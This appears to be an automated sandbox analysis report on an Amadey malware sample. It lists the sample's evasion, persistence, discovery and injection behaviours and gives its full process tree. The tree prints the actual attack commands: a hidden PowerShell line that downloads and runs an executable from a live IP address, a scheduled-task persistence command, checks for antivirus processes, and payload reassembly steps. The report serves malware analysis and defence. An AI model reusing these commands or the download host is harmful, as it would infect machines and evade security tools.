amadey | bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempX4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	culBzEZ.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	3064	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
296	powershell.exe
4916	powershell.exe
2572	powershell.exe
548	powershell.exe
296	powershell.exe
1988	powershell.exe
3064	powershell.exe

Downloads MZ/PE file 8 IoCs

flow	pid	Process
7	1848	rapes.exe
7	1848	rapes.exe
7	1848	rapes.exe
7	1848	rapes.exe
7	1848	rapes.exe
7	1848	rapes.exe
4	3064	powershell.exe
14	1848	rapes.exe

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	culBzEZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	culBzEZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempX4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempX4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs	T0QdO0l.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url	cmd.exe

Executes dropped EXE 15 IoCs

pid	Process
2904	TempX4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE
1848	rapes.exe
1444	HmngBpR.exe
408	SplashWin.exe
1552	SplashWin.exe
2212	ADFoyxP.exe
2652	Seat.com
2824	9hUDDVk.exe
408	pwHxMTy.exe
2476	T0QdO0l.exe
1512	culBzEZ.exe
2828	Build.exe
4344	jdehFMM.exe
4332	6sbmSAg.exe
2032	6sbmSAg.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	culBzEZ.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	TempX4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	rapes.exe

Loads dropped DLL 48 IoCs

pid	Process
3064	powershell.exe
3064	powershell.exe
2904	TempX4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE
2904	TempX4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE
1848	rapes.exe
408	SplashWin.exe
408	SplashWin.exe
408	SplashWin.exe
408	SplashWin.exe
1552	SplashWin.exe
1552	SplashWin.exe
1552	SplashWin.exe
1848	rapes.exe
2544	cmd.exe
1848	rapes.exe
2652	Seat.com
1848	rapes.exe
1848	rapes.exe
2444	WerFault.exe
2444	WerFault.exe
2444	WerFault.exe
2444	WerFault.exe
1848	rapes.exe
2444	WerFault.exe
1848	rapes.exe
1848	rapes.exe
1512	culBzEZ.exe
1848	rapes.exe
1848	rapes.exe
1840	WerFault.exe
1840	WerFault.exe
1840	WerFault.exe
1840	WerFault.exe
1840	WerFault.exe
2432	WerFault.exe
2432	WerFault.exe
2432	WerFault.exe
2432	WerFault.exe
2432	WerFault.exe
1848	rapes.exe
4332	6sbmSAg.exe
2032	6sbmSAg.exe
2032	6sbmSAg.exe
2032	6sbmSAg.exe
2032	6sbmSAg.exe
2032	6sbmSAg.exe
2032	6sbmSAg.exe
2032	6sbmSAg.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ipinfo.io
12	ipinfo.io

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
1784	tasklist.exe
1216	tasklist.exe
3720	tasklist.exe
3504	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
2904	TempX4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE
1848	rapes.exe
1512	culBzEZ.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1552 set thread context of 1476	1552	SplashWin.exe	43

Drops file in Windows directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\UpdatedMakeup	ADFoyxP.exe
File created	C:\Windows\Tasks\rapes.job	TempX4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE
File opened for modification	C:\Windows\PerfectlyFda	ADFoyxP.exe
File opened for modification	C:\Windows\AccreditationShed	ADFoyxP.exe
File opened for modification	C:\Windows\GovernmentsHighly	ADFoyxP.exe
File opened for modification	C:\Windows\HighKerry	ADFoyxP.exe
File opened for modification	C:\Windows\PracticalPrevent	ADFoyxP.exe
File opened for modification	C:\Windows\FilenameWho	ADFoyxP.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000600000001c78d-1737.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 7 IoCs

pid	pid_target	Process	procid_target
2444	2824	WerFault.exe	66
1804	2344	WerFault.exe	67
1840	2828	WerFault.exe	75
2432	2476	WerFault.exe	71
3212	3104	WerFault.exe	101
3240	5088	WerFault.exe	98
3828	3148	WerFault.exe	102

System Location Discovery: System Language Discovery 1 TTPs 38 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Seat.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ADFoyxP.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pwHxMTy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	culBzEZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SplashWin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	T0QdO0l.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Build.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SplashWin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9hUDDVk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	expand.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempX4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1592	schtasks.exe
296	schtasks.exe

Suspicious behavior: EnumeratesProcesses 42 IoCs

pid	Process
3064	powershell.exe
3064	powershell.exe
3064	powershell.exe
2904	TempX4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE
1848	rapes.exe
1444	HmngBpR.exe
1444	HmngBpR.exe
408	SplashWin.exe
1552	SplashWin.exe
1552	SplashWin.exe
1552	SplashWin.exe
2652	Seat.com
2652	Seat.com
2652	Seat.com
2652	Seat.com
2652	Seat.com
2652	Seat.com
2652	Seat.com
2652	Seat.com
2652	Seat.com
2652	Seat.com
2652	Seat.com
2652	Seat.com
2652	Seat.com
2652	Seat.com
2652	Seat.com
2652	Seat.com
2652	Seat.com
2652	Seat.com
1476	cmd.exe
1476	cmd.exe
2652	Seat.com
2652	Seat.com
2652	Seat.com
1512	culBzEZ.exe
296	powershell.exe
2476	T0QdO0l.exe
1988	powershell.exe
2572	powershell.exe
296	powershell.exe
296	powershell.exe
548	powershell.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
1552	SplashWin.exe
1476	cmd.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	3064	powershell.exe
Token: SeDebugPrivilege	1784	tasklist.exe
Token: SeDebugPrivilege	1216	tasklist.exe
Token: SeDebugPrivilege	2476	T0QdO0l.exe
Token: SeDebugPrivilege	2828	Build.exe
Token: SeDebugPrivilege	296	powershell.exe
Token: SeDebugPrivilege	2476	T0QdO0l.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	2572	powershell.exe
Token: SeDebugPrivilege	548	powershell.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
1632	bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9.exe
1632	bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9.exe
1632	bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9.exe
2904	TempX4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE
2652	Seat.com
2652	Seat.com
2652	Seat.com

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
1632	bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9.exe
1632	bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9.exe
1632	bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9.exe
2652	Seat.com
2652	Seat.com
2652	Seat.com

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1444	HmngBpR.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1632 wrote to memory of 1212	1632	bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9.exe	30
PID 1632 wrote to memory of 1212	1632	bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9.exe	30
PID 1632 wrote to memory of 1212	1632	bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9.exe	30
PID 1632 wrote to memory of 1212	1632	bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9.exe	30
PID 1632 wrote to memory of 352	1632	bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9.exe	31
PID 1632 wrote to memory of 352	1632	bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9.exe	31
PID 1632 wrote to memory of 352	1632	bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9.exe	31
PID 1632 wrote to memory of 352	1632	bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9.exe	31
PID 1212 wrote to memory of 1592	1212	cmd.exe	33
PID 1212 wrote to memory of 1592	1212	cmd.exe	33
PID 1212 wrote to memory of 1592	1212	cmd.exe	33
PID 1212 wrote to memory of 1592	1212	cmd.exe	33
PID 352 wrote to memory of 3064	352	mshta.exe	34
PID 352 wrote to memory of 3064	352	mshta.exe	34
PID 352 wrote to memory of 3064	352	mshta.exe	34
PID 352 wrote to memory of 3064	352	mshta.exe	34
PID 3064 wrote to memory of 2904	3064	powershell.exe	36
PID 3064 wrote to memory of 2904	3064	powershell.exe	36
PID 3064 wrote to memory of 2904	3064	powershell.exe	36
PID 3064 wrote to memory of 2904	3064	powershell.exe	36
PID 2904 wrote to memory of 1848	2904	TempX4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE	37
PID 2904 wrote to memory of 1848	2904	TempX4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE	37
PID 2904 wrote to memory of 1848	2904	TempX4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE	37
PID 2904 wrote to memory of 1848	2904	TempX4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE	37
PID 1848 wrote to memory of 1444	1848	rapes.exe	40
PID 1848 wrote to memory of 1444	1848	rapes.exe	40
PID 1848 wrote to memory of 1444	1848	rapes.exe	40
PID 1848 wrote to memory of 1444	1848	rapes.exe	40
PID 1444 wrote to memory of 408	1444	HmngBpR.exe	41
PID 1444 wrote to memory of 408	1444	HmngBpR.exe	41
PID 1444 wrote to memory of 408	1444	HmngBpR.exe	41
PID 1444 wrote to memory of 408	1444	HmngBpR.exe	41
PID 408 wrote to memory of 1552	408	SplashWin.exe	42
PID 408 wrote to memory of 1552	408	SplashWin.exe	42
PID 408 wrote to memory of 1552	408	SplashWin.exe	42
PID 408 wrote to memory of 1552	408	SplashWin.exe	42
PID 1552 wrote to memory of 1476	1552	SplashWin.exe	43
PID 1552 wrote to memory of 1476	1552	SplashWin.exe	43
PID 1552 wrote to memory of 1476	1552	SplashWin.exe	43
PID 1552 wrote to memory of 1476	1552	SplashWin.exe	43
PID 1552 wrote to memory of 1476	1552	SplashWin.exe	43
PID 1848 wrote to memory of 2212	1848	rapes.exe	45
PID 1848 wrote to memory of 2212	1848	rapes.exe	45
PID 1848 wrote to memory of 2212	1848	rapes.exe	45
PID 1848 wrote to memory of 2212	1848	rapes.exe	45
PID 2212 wrote to memory of 2544	2212	ADFoyxP.exe	46
PID 2212 wrote to memory of 2544	2212	ADFoyxP.exe	46
PID 2212 wrote to memory of 2544	2212	ADFoyxP.exe	46
PID 2212 wrote to memory of 2544	2212	ADFoyxP.exe	46
PID 2544 wrote to memory of 2076	2544	cmd.exe	48
PID 2544 wrote to memory of 2076	2544	cmd.exe	48
PID 2544 wrote to memory of 2076	2544	cmd.exe	48
PID 2544 wrote to memory of 2076	2544	cmd.exe	48
PID 2544 wrote to memory of 1784	2544	cmd.exe	49
PID 2544 wrote to memory of 1784	2544	cmd.exe	49
PID 2544 wrote to memory of 1784	2544	cmd.exe	49
PID 2544 wrote to memory of 1784	2544	cmd.exe	49
PID 2544 wrote to memory of 1540	2544	cmd.exe	50
PID 2544 wrote to memory of 1540	2544	cmd.exe	50
PID 2544 wrote to memory of 1540	2544	cmd.exe	50
PID 2544 wrote to memory of 1540	2544	cmd.exe	50
PID 2544 wrote to memory of 1216	2544	cmd.exe	52
PID 2544 wrote to memory of 1216	2544	cmd.exe	52
PID 2544 wrote to memory of 1216	2544	cmd.exe	52

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1152
- C:\Users\Admin\AppData\Local\Temp\bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9.exe
  "C:\Users\Admin\AppData\Local\Temp\bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:1632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /create /tn TZEwnmaJpGH /tr "mshta C:\Users\Admin\AppData\Local\Temp\IOX249nFz.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1212
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn TZEwnmaJpGH /tr "mshta C:\Users\Admin\AppData\Local\Temp\IOX249nFz.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:1592
- - C:\Windows\SysWOW64\mshta.exe
    mshta C:\Users\Admin\AppData\Local\Temp\IOX249nFz.hta
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory
    PID:352
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Downloads MZ/PE file
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3064
    - - C:\Users\Admin\AppData\Local\TempX4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE
        
        "C:\Users\Admin\AppData\Local\TempX4ZFS558DGPHJTROJ0TCUGIVK6FDX5XW.EXE"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:2904
      - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1848
        
        C:\Users\Admin\AppData\Local\Temp\10111840101\HmngBpR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10111840101\HmngBpR.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1444
        
        C:\Users\Admin\AppData\Local\Temp\KM_daemon\SplashWin.exe
        
        C:\Users\Admin\AppData\Local\Temp\KM_daemon\SplashWin.exe
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:408
        
        C:\Users\Admin\AppData\Roaming\KM_daemon\SplashWin.exe
        
        C:\Users\Admin\AppData\Roaming\KM_daemon\SplashWin.exe
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:1552
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        10⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:1476
        
        C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:2344
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 256
        12⤵
        Program crash
        
        PID:1804
        
        C:\Users\Admin\AppData\Local\Temp\10112790101\ADFoyxP.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10112790101\ADFoyxP.exe"
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2212
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
        8⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2544
        
        C:\Windows\SysWOW64\expand.exe
        
        expand Go.pub Go.pub.bat
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2076
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        9⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1784
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:1540
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        9⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1216
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2720
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 353090
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2580
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Really.pub
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:872
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "posted" Good
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2912
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2388
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:1980
        
        C:\Users\Admin\AppData\Local\Temp\353090\Seat.com
        
        Seat.com m
        9⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2652
        
        C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
        10⤵
        
        PID:1440
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2668
        
        C:\Users\Admin\AppData\Local\Temp\10114440101\9hUDDVk.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10114440101\9hUDDVk.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2824
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 832
        8⤵
        Loads dropped DLL
        Program crash
        
        PID:2444
        
        C:\Users\Admin\AppData\Local\Temp\10114630101\pwHxMTy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10114630101\pwHxMTy.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:408
        
        C:\Users\Admin\AppData\Local\Temp\10115790101\T0QdO0l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10115790101\T0QdO0l.exe"
        7⤵
        Drops startup file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2476
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 644
        8⤵
        Loads dropped DLL
        Program crash
        
        PID:2432
        
        C:\Users\Admin\AppData\Local\Temp\10118750101\culBzEZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10118750101\culBzEZ.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1512
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Lappy.A.vbs"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2744
        
        C:\Users\Admin\AppData\Local\Temp\Build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Build.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2828
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2828 -s 984
        9⤵
        Loads dropped DLL
        Program crash
        
        PID:1840
        
        C:\Users\Admin\AppData\Local\Temp\10118770101\jdehFMM.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10118770101\jdehFMM.exe"
        7⤵
        Executes dropped EXE
        
        PID:4344
        
        C:\Windows\system32\cmd.exe
        
